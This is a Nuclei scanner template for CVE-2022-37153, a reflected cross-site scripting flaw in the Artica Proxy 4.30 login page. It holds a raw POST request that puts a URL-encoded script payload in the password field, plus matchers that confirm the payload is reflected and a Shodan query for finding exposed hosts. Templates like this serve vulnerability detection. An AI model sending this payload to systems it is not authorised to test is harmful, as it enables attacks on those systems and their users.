58 lines
1.7 KiB
YAML
58 lines
1.7 KiB
YAML
id: CVE-2022-37153
|
|
|
|
info:
|
|
name: Artica Proxy 4.30.000000 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php.
|
|
remediation: |
|
|
Upgrade to a patched version of Artica Proxy or apply the vendor-supplied patch to mitigate the vulnerability.
|
|
reference:
|
|
- https://github.com/Fjowel/CVE-2022-37153
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-37153
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-37153
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00099
|
|
epss-percentile: 0.40838
|
|
cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: articatech
|
|
product: artica_proxy
|
|
shodan-query: http.html:"Artica"
|
|
tags: cve,cve2022,xss,artica
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /fw.login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Password" value="admin"><script>alert(document.domain)</script>'
|
|
- 'Artica Web'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502200c466e80f9503c6142c5c79e46789701676193f8590879413aab3b61ab35b5c9022100b7fa93b65856c6c4cd7cc45d49bf23cae716c9c5cae48c38d0b360f927ec6485:922c64590222798bb761d5b6d8e72950
|